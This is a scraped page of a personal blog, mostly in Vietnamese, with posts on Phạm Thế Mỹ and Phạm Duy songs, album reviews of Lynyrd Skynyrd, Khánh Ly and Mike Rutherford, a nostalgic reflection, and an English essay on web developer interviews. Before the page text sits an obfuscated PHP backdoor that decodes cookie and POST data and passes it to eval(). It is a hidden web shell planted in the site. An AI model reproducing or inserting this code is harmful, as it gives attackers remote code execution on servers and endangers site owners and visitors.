$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> B.l.u.e – Inside the crowd, I dance [alone]

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Trăng tàn trên hè phố & Những ngày xưa thân ái

Hãy nói qua về Phạm Thế Mỹ.

Phạm Thế Mỹ là một trường hợp đặc biệt hiếm hoi trong làng âm nhạc Việt Nam, cả trước và sau 1975. Ông là nhạc sĩ Việt-cộng, nhưng những bài nhạc của ông được các ca sĩ lính-quốc-gia hát nhiều đến mức, nếu không thật sự tìm hiểu kĩ, những bài nhạc đó rất dễ bị lầm tưởng là viết cho Việt Nam Cộng Hoà. Dẫn đến việc, có một số bài của ông rất nổi tiếng được cấp phép chính thức và được hát khắp nơi: “Bông hồng cài áo”, “Hoa vẫn nở trên đường quê hương”…, lại có những bài đến giờ vẫn chưa được cấp phép hát, như: “Trăng tàn trên hè phố”” và “Những ngày xưa thân ái”.

Cả 2 bài “Trăng tàn trên hè phố” và “Những ngày xưa thân ái” xứng được liệt vào danh sách những bài nhạc vàng hay nhất ở miền Nam trước năm 1975. Rất nhiều ca sĩ thành danh ở miền Nam ngày đó, và hải ngoại hiện tại, vẫn trình bày 2 ca khúc này của ông: Duy Khánh, Giang Tử, Tuấn Vũ, sau thì có Băng Tâm, Đan Nguyên, Trường Vũ, Như Quỳnh…

Bài “Trăng tàn trên hè phố” có những câu rất đẹp, mà ắt phải có một tâm hồn tinh tế, yêu quê hương, xúc động với thời cuộc, tác giả mới viết ra được

Lối gầy về nhà anh hoa phượng thắm
Màu xanh áo người thương
Nắng chiều đẹp quê hương
Hay nhạc buồn đêm sương

hay

Ánh trăng khuya sắp tàn trên hè phố
Thôi mình chia tay
Rồi mai đây có về
Quà cho tôi anh nhớ chép bài thơ

Nhưng ở note này, hãy nói chủ yếu về bài “Những ngày xưa thân ái”. Bài này, theo mình, phải nghe Duy Khánh hát mới thấm được thấy cái đẹp và buồn đến tê tái của cảnh chiến tranh bão lửa, những gì còn hoài vọng về, ắt chỉ có kỉ niệm đẹp của những ngày xa xưa êm đềm, đầy thân ái. Đặc biệt, câu

Nghe tin anh gục ngã dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

mỗi lần nghe, đều khiến lòng mình trùng xuống.

Điều đặc biệt, “Những ngày xưa thân ái” nguyên bản là một bài thơ của người anh ruột nhạc sĩ – nhà thơ Phạm Hổ, khi đó đã tập kết ra Bắc. Sau khi Phạm Hổ sáng tác bài thơ đó, thì ở miền Nam, Phạm Thế Mỹ cũng cho ra mắt bài nhạc cùng tên, nhưng ca từ nhân văn và dạt dào tình cảm hơn nhiều, dù nội dung chính đều là về “những ngày xưa”. Thôi, nói tới đây thôi, nói dài quá lại lan man qua chính trị…

Lời bài thơ của Phạm Hổ:

Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Những ngày xưa thân ái
Chắc hắn quên rồi
Riêng tôi, tôi nhớ:
Đồng làng mênh mông biển lúa
Sương mai đáp trắng cỏ đường
Hai đứa tôi,
Sách vở cặp chung
Áo quần nhàu giấc ngủ
Song song bước nhỏ chân trần
Gói cơm mo mẹ vắt xách tùng tơn
Nón rộng hỏng quai
Trong túi hộp diêm nhốt dế
Những ngày xưa êm đẹp thế
Không đem chung hai đứa một ngày mai
Hắn bỏ làng theo giặc mấy năm nay
Tôi buồn tôi giận,
Đêm nay gặp hắn,
Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Xác hắn nằm bờ ruộng
Không phải hắn thuở xưa
Tôi cúi nhìn mặt hắn
Tiếc hắn thời ấu thơ.

Lời bài nhạc cùng tên của Phạm Thế Mỹ:

Những ngày xưa thân ái anh gởi lại cho ai
Gió mùa xuân êm đưa rung hàng cây lưa thưa
Anh cùng tôi bước nhỏ áo quần nhăn giấc ngủ
Đi tìm chim sáo nở ôi bây giờ anh còn nhớ ?

Những ngày xưa thân ái xin gởi lại cho ai
Trăng mùa thu lên cao khóm dừa xanh lao xao
Anh cùng tôi trốn ngủ ra ngồi hiên lá đổ
Trong bầy chim trắng hiền mơ một nàng tiên dịu hiền

Đêm đêm nằm nghe súng nổ giữa rừng khuya thác đổ, anh còn nhắc tên tôi ?
Đêm đêm nhìn trăng sáng tỏ bên đồi hoa trắng nở, cuộc đời anh có vui ?
Thời gian qua mau tìm anh nơi đâu
Tôi về qua xóm nhỏ con đò nay đã già
Nghe tin anh gục ngã
Dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

Những đường xưa phố cũ thôi nỡ đành quên sao
Xin gọi lại tên anh giữa trời sao long lanh
Anh giờ yên giấc ngủ tôi nằm nghe súng nổ
Như lời anh nhắc nhở ôi câm hờn dâng ngập lối
Những ngày xưa thân ái xin buộc vào tương lai
Anh còn gì cho tôi tôi còn gì cho em
Chỉ còn tay súng nhỏ giữa rừng sâu giết thù
Những ngày xưa thân ái xin gởi lại cho em

Note thêm dù chẳng liên quan, là bài “Áo Lụa Vàng”, rất nổi tiếng qua tiếng hát Khánh Ly

Ngày mai em đến, xin mặc áo lụa vàng, nghe em hãy nhớ.
Quê hương anh đó, đang cần đến tình người, đang cần đến nụ cười
Cho tâm hồn nghỉ ngơi

cũng là một bài đầy nhân văn, được nhạc sỹ Phạm Thế Mỹ sáng tác để tặng Hà Thanh, vì có một lần, khi đến thăm ông trên giường bệnh, Hà Thanh mặc trên người một chiếc áo lụa vàng.

p/s: bài Trăng tàn trên hè phố, mình đặc biệt thích version Phương Diễm Hạnh trình bày ở Paris By Night [embedyt] http://www.youtube.com/watch?v=lQtAFSoKf30[/embedyt]

Chỉ chừng đó thôi

Ngày đó Phạm Duy yêu Helene, một cô gái ngoại quốc. Helene sống ở Sài Gòn cùng con gái mình là Alice. Ngày xưa khi còn quen biết và tới nhà Helene, Alice còn bé xíu, thế mà bẵng đi vài chục năm sau gặp lại, Alice đã trở thành một thiếu nữ xinh đẹp. Phạm Duy và Alice phải lòng nhau.

Phạm Duy ngày đó chả vừa, là một người đam mê nhục dục xác thịt (điều này chính ông thừa nhận), nhưng mối tình với Alice là mối tình ông gọi là “mối tình đồng trinh duy nhất” – cả hai chỉ yêu nhau qua tâm hồn, không có bất cứ liên hệ gì về thể xác. Đây có thể xem là một trong những mối tình thơ nhạc đẹp nhất của nền văn học nghệ thuật miền Nam trước giải phóng. Trong rất nhiều bài nhạc của mình, Phạm Duy đều có đề tặng Lệ Lan, sau này mọi người mới biết đó là tên Việt của Alice. Alice cũng viết tặng Phạm Duy tới gần 300 bài thơ, rất nhiều trong đó được ông phổ nhạc.

Trước khi đi lấy chồng, Lệ Lan đã gửi cho nhạc sỹ Phạm Duy một bức thư. Trong đó bà viết: “Mười năm, quá đủ cho một mối tình đẹp và một đời người ngắn ngủi…(…)…Từ đây đến ngày cưới có thể L. sẽ xin gặp chú một, hai lần nữa. Chẳng để làm gì cả. L. chắc chú cũng nghĩ như L. Chẳng có gì bi thảm. Chẳng có gì tiếc hận. Một mối tình đẹp kết thúc một cách êm ái. L. chỉ xin giữ lại một chút dư hương để truyền lại cho các con của L. sau này cho chúng nó cũng có một tâm hồn biết yêu thương đằm thắm”.

Như Phạm Duy sau này về già hồi tưởng, thì có tới hơn 40 bài nhạc của ông lấy Lệ Lan làm cảm hứng, trong đó tiêu biểu nhất là 3 bài:
– Ngày ấy chúng mình – đánh dấu thời điểm yêu nhau
– Nghìn trùng xa cách – đánh dấu thời điểm xa nhau
– Chỉ chừng ấy thôi – đánh dấu thời điểm ông quyết định quên Lệ Lan

—————–

À, sẵn tiện đang nghe “Chỉ Chừng Ấy Thôi” nên viết,

Chỉ cần một cơn mưa
Là vai gầy thêm nữa
Cho ướt môi, mềm da
Chỉ cần giọt mưa sa

Chỉ chờ một cơn mưa
Để không ngờ chi nữa
Đi dưới mưa hồng nghe
Giọt nhẹ vào tim ta.

For M, M sống tốt nhé.

Lynyrd Skynyrd – First And Last…

First And Last là album được phát hành ngay sau tai nạn máy bay thảm khốc đã góp phần làm tan rã ban nhạc được xem như là một trong những tên tuổi lớn nhất của dòng nhạc rock miền Nam (southern rock): Lynyrd Skynyrd. Những bài trong album này là một trong những bài đầu tiên mà Lynyrd Skynyrd đã chơi, nhưng vì nhiều lí do không được chọn đưa vào album (Pronounced ‘Lĕh-‘nérd ‘Skin-‘nérd) của họ.

Nhìn chung album này không phải là album xuất sắc nhất của Lynyrd Skynyrd, nhưng là album nên có nếu bạn là fan ruột của nhóm, hay đơn thuần chỉ mê cái thứ nhạc đầy mịt mờ bụi bặm của các xứ sở phương Nam đầy phóng khoáng.

Hãy nói đặc biệt về “Was I Right Or Wrong” – một bài hát mà theo mình, có thể sánh ngang với những bản nhạc tuyệt vời nhất viết về miền Nam như “Sweet Home Alabama” hay “Free Bird” của nhóm. Cũng đã lâu rồi, mình mới nghe lại được một bản nhạc đúng nghĩa Southern Rock như thế. Người ta nói, lời nhạc của Van Zant như viết về câu chuyện ‘kinh điển’ của các thanh niên miền Nam ngày đó: bất đồng với gia đình, bỏ nhà đi lang bạt mong một ngày nở mày nở mặt hồi hương,

Papa used to always say I was a useless fool
So I left my home to show ’em they was wrong

để rồi khi quay trở lại, đón tiếp anh không phải là nụ cười của mẹ, niềm tự hào của cha, mà là hai tấm mộ bia

When I went home to show ’em they was wrong
All that I found was two tombstones

và rồi cứ sống trong nỗi băn khoan là mình đúng hay sai

Somebody tell me, please, was I right or wrong?

Bài nhạc buồn, và hay đến mức, nghe xong cả album chỉ còn nó đọng mãi.

Web Developer Interviews – it’s a journey, not a destination

I’ve grown up hating tests – all kinds, although most of the time I did pretty well. I don’t know what’ve happened but I end up, currently, liking to take job interviews, especially ones with test. It might be just a way to feel proud of myself, to look for new challenges, or I am just plain bored and want to do something new. I have been to a lot of assessments recently, maybe not a lot, but quite bunch of them; enough to tell stories about, or just rage at things for no specific reason.

But here they are, some kinds of interview that being a web developer, I have had:

These are ones I dislike

The ‘I-bet-you-don’t-know-Google’ one

Okay, you submit your resume, they send you link for the assessment. You take a deep breath, cross your finger, go to Spotify searching for the most concentration music they have there, and ready to conquer it. Nothing is more disappointed when you see it is the multiple-choice all theory test.

Like, seriously, when you ask people stuffs like:

What does substr() function do?

a. Returns the portion of string specified by the start and length parameters.

b. To subtract a number from another number.

c. To replace all occurrences of the search string with the replacement string

d. How can I know

you don’t think people can just go to Google, type: substr site:php.net for the answer, do you?

Or some questions like:

What will it echo out when we have these codes

$a = 5; $b = 6;

echo $a < $b ? ‘Good, you are better than a 5th grader’ : ‘Of course everyone knows this is not the correct answer’;

At first, I am reading through them line by line, trying as hard as Hermione to solve them. But then later, I just decide to be Weasley, as you can tell, be a cheater by just copying the whole thing to my IDE and refresh the browser for result. This is to me the most non-sense assessment.

The ‘php-manual-like-your-bible’

I hate when coming to an interview and there is nothing but a white paper and a pen in front of me. That means the interviewer, well, if I’m lucky, my future boss, will expect me to remember everything in the PHP manual like my grandma does with her old bible. Take strpos() function as example, I swear, I must use it over thousand times, but I am still not sure which comes first, the haystack or the needle. To me, it is totally not important because almost every single IDE shows me the answer when I type in substr( right away; or it takes just 5 seconds to look up on the Internet. Although it is better to remember, I just don’t think it is a good way to test your candidates’ skills.

I still recall one time I was on a phone interview with that web manager from a big company. He asked me so many questions which my answers were like: I know what they are, their purposes, when to use them, I just don’t remember their syntaxes exactly. In the end, he then asked me: so do you have any question about our company? which I promptly asked: do you guys have Internet there? It seems to me you don’t because you asked your candidate to remember everything. He was unhappy about it, and I haven’t heard from him since.

The ‘real-life-project-one’

I know, one of the most important thing is whether the candidate can start his job as soon as possible. Who likes a guy that request 2 months just to ‘learn’ about your company’s current system, right? So, this is where ‘let me just take one of our real project and give you as an assessment’ idea comes from. It is nice to a certain level, and some companies even offer to pay money for that, because apparantly it is still cheaper than recruiting a guy who does not fit. Problem is projects which seem like simple ones from your standard, are not, to others’. And the communication back and forth to get enough information to do that test is a nightmare, since you haven’t known each other yet, and still be put into a situation that requires so.

I once had an assessment like that after I passed the first interview. To be honest, it was not a complicated project, however I was just given the project’s requirement and left without any information further – things that every developers needed to start a web project: what your current database schema is, what data access layer you’re using, what your codebase looks like now, are you using strictly OOP or just procedural coding? …

 

The one I liked

Here is the package

Yep, they send you a zip file that contains all the instructions, requirements and give you a day or two to do it. You can Google and copy every single damn code line, you can even ask your dog to do it for you. In the end, if the zip file you send them back works, you are welcome to the company.

I like it because it doesn’t give me any pressure. I got my previous job like that. I was worried since the test gave me too much room to do whatever I wanted that I might be unable to fulfill their requirements when I came there officially. Like, I used Googe a lot when I did the test, what if they supposed me to work without using one. Turned out it was not that bad, I still had a job until I decided to switch to another. I guess they didn’t really worry since Texas was a free-to-work state, they could fire me if they found out I didn’t meet their expectations

The devskiller-type

My most recent assessment was through a tool called devskiller. Basically devskiller an online platform that many companies use now. It is difficult to describe, so let me give an example. My test there was a set of many step-to-step requirements:

  • First, it asked you to write queries to create 2 tables, then to create foreign key constraint between them
  • Then it asked you to write a class to connect to database using Singleton Design Pattern
  • Then on their current Customer.php file (which they already had __construct and other necessary functions), write one to search all, search by specific name, save…
  • Same for Address.php
  • Then a page that displayed all Customers together with their Addresses if had any
  • ….

Thing I liked about that tool was it used PHPUnit to test my code. For all who don’t know PHPUnit, it is one of the best testing tool out there. It calls your function, expects a result, and if your function returns the same, then you pass that test. So for example, it searches for customer ‘Larry’ using the function you’ve written Customer::Search(‘Larry’) and expects information about Larry, if yours returns what it expects, you pass.

So as you are doing the assessment, you know how good you have gone so far. And it is pretty clear, just either pass or fail, you don’t need to worry further about your code.

 

 

I haven’t had a chance to be manager to interview anyone yet, but if I do, I think I will definitely go with the devskiller one, it can save both of my and the candidates’ time. In the mean time, it’s still fun to look for new challenges elsewhere sometimes…

buổi trưa

Hôm nay là ngày bốn năm một lần, như người ta hay gọi, anh nghĩ rất nhiều thứ. Em biết không, cuối tuần thường là thời gian anh buồn nhất, vì đó là những ngày duy nhất anh ngủ trưa. Anh ít nghĩ nhiều trước khi anh ngủ mỗi tối, vì thường những công việc trong ngày vắt kiệt sức của anh, anh chỉ leo lên giường, nghe nhạc và nhắm mắt lại, ngủ rất nhanh.

Thế nhưng, những buổi trưa cuối tuần, anh nằm trên giường, mệt nhọc, nhìn ra cửa sổ bên ngoài nắng chói chang, tim anh thắt lại khi nghĩ về nhiều thứ. Những buổi trưa nắng và uể oải luôn gợi anh nhớ đến rất nhiều thứ, anh biết anh chưa từng quên, nhưng không phải luôn nhớ về.

Đó là những trưa cấp 1 tan học nắng chói trên đầu, đi bộ trên con đường đất về nhà. Ngày đó còn nhỏ, đường sao mà xa xôi và mệt nhọc thế?
Đó là những buổi trưa lớp 7, lớp 8, bà nội anh trưa nào cũng làm cho ăn một cái đùi gà chiên bơ thơm nức, anh vừa ăn vừa nuối tiếc vì phải bỏ nửa chừng tập phim chiếu lúc 12 giờ (anh còn nhớ đó là Thanh Cung Mười Ba Hoàng Triều), để đạp xe cọc cạch đến trường.
Đó là những buổi trưa lớp 12, anh ở lại trường học thi đại học, cả bọn đi vòng vòng tìm lớp học nào trống, kê bàn kê ghế lại rồi ngủ trưa, giấc ngủ ngắn mệt nhoài.

Đó dù là những ngày trưa ở Việt Nam đầy ngây thơ, trẻ trung, hay là những trưa của buổi đầu sang nước Mỹ, lo sợ và mất định hướng, cứ nằm buổi trưa nghĩ là anh thấy mệt nhoài. Cứ có thứ gì rất nặng trong tim anh, khó giải thích, anh nghĩ là vì anh tiếc hay anh nhớ một anh của thuở xa xưa đấy.

Chính những kí ức vụn vặt thế về ngày xưa, về anh một thuở, về những khuôn mặt nửa lạ lửa quen, cứ như một vòng tròn thắt chặt trái tim anh. Anh đang mất định hướng hay anh đang băn khoăn? Anh đang nhớ, đang buồn hay đang hồi vọng? Anh không còn có thể trả lời được rồi…

-H

Khánh Ly – Lullaby of Đà Nẵng

“Lullaby Of Đà Nẵng” là tên đĩa nhạc được Khánh Ly thu vào năm 1987 tại Nhật với hãng đĩa Nippon Columbia rất lớn thời điểm đó. Đây cũng là bài hát chủ đề trong bộ phim “Thuyền Nhân” do Nhật Bản – Hồng Kông sản xuất từng gây tiếng vang không nhỏ.

Mình nghe Khánh Ly, chắc là nhiều lắm, nhưng chưa bao giờ nghe tới bài này, cho tới khi tìm được và vất vả đấu giá thắng đĩa trên eBay. Trong khoảng thời gian chờ đĩa ship từ Nhật qua, mình luôn có thắc mắc là “Lullaby of Đà Nẵng” dịch là “Lời ru của Đà Nẵng” (dành cho những người con đã bỏ ra đi), hay là “Lời ru cho Đà Nẵng” (lời của những người con dành cho đất mẹ mình đã bỏ lại). Mình nghĩ là cho.

Câu chuyện “thuyền nhân” là những câu chuyện dài và rất khó kể hết. Những lần hội họp gia đình, đa phần mình đều được nghe các cậu, các dì, hay là cả mẹ mình kể về những ngày trở thành thuyền-nhân đó. Những câu chuyện đôi khi xen chút bông đùa, tưởng như nhẹ nhàng, nhưng sức nặng và dấu ấn mà nó để lại, với đời mẹ mình chưa phai, và tới mình, dù không trải qua cũng lại hằn in không bớt.

Tối nay, khi đĩa về, tự mình pha cho mình một li Tequila (mình rất hiếm uống một mình), chui vào phòng, tắt đèn và bỏ đĩa vào mâm. Ngay khi tiếng cô Khánh Ly vang lên từ những giây đầu bài, tim mình đã trĩu nặng, li rượu trên tay đột nhiên thành đắng nghét. Cũng không ngờ, một bài nhạc trong thời điểm này lại khiến mình xúc động nhiều như thế

Nước mắt rơi xuống thân phận người
Khóc giấc mơ đã tan tành rồi
Em yêu hỡi! xa muôn đời
Còn đâu nữa quê hương tuyệt vời…

Khi Khánh Ly kết thúc bài hát bằng 4 câu đó, mình nhìn ra ngoài bầu trời đêm đen thăm thẳm thấy nhớ, nhớ tất cả mọi thứ ở Việt Nam, nhớ gì đâu…

p/s: đĩa còn rất mới, cả 2 bài đều là nhạc của Hako Yamasaki. Bài mặt 1 là “Lullaby of Đà Nẵng”, lời do Nguyễn Hoàng Đoan – chồng cũ Khánh Ly soạn. Bài mặt 2 là “Sao hôm nay”. Điều lạ là khi chơi đĩa ở tốc độ 45 vòng thì là tiếng hát Khánh Ly, khi để đĩa sang chế độ chơi bình thường 33 vòng thì là tiếng của một ca sĩ nam nào đó…

Mike Rutherford ‎– Smallcreep’s Day

Smallcreep’s Day là album solo đầu tiên của Mike Rutherford – tay bass của ban nhạc rock Anh quốc Genesis lừng danh. Album nhận được sự đón nhận khá trái chiều của thính giả nghe nhạc. Đa phần những fan hâm mộ gạo cội của Genesis thì mong chờ ở Mike một thứ nhạc rock đúng-chất-Genesis khi nào, nhất là khi Mike có sự giúp sức của Anthony Phillips (guitar chính trong Genesis), được sản xuất bởi David Hentschel (mà cùng năm giúp sản xuất một trong những đĩa hay nhất của Genesis – Duke). Tuy nhiên, một lượng fan hâm mộ khác thì hài lòng với những gì mà Mike tạo ra trong album này, dù nó khá khác lạ.

Chất nhạc trong album khá hay, ít nhất là đối với mình, vì mình luôn có chút yêu thích cá nhân dành cho thể loại progressive rock. Concept của album cũng khá lạ với ca khúc cũng là tựa album, bao gồm 7 ca khúc nhỏ, chiếm cả một mặt của record.

Dù Smallcreep’s Day không phải là thứ thành công nhất mà Mike Rutherford có ‘ngoài’ Genesis, nhưng nó tạo tiền đề cho ông và ban The Mechanics sau này…

Mình nghĩ album này được 4/5 điểm.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.